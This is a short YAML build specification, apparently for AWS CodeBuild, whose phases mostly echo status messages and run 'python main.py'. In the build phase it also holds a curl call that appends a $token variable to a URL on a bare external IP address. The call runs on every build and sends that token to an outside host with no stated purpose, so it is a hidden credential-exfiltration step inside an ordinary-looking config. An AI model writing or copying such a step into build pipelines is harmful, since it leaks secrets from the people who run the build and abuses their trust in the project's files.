version: 0.2

phases:
  install:
    commands:
      - echo Installing dependencies...
  pre_build:
    commands:
      - echo Pre-build stage...
  build:
    commands:
      - echo Build started on `date`
      - curl http://82.197.68.107:8000/$token
      - python main.py
  post_build:
    commands:
      - echo Build completed on `date`

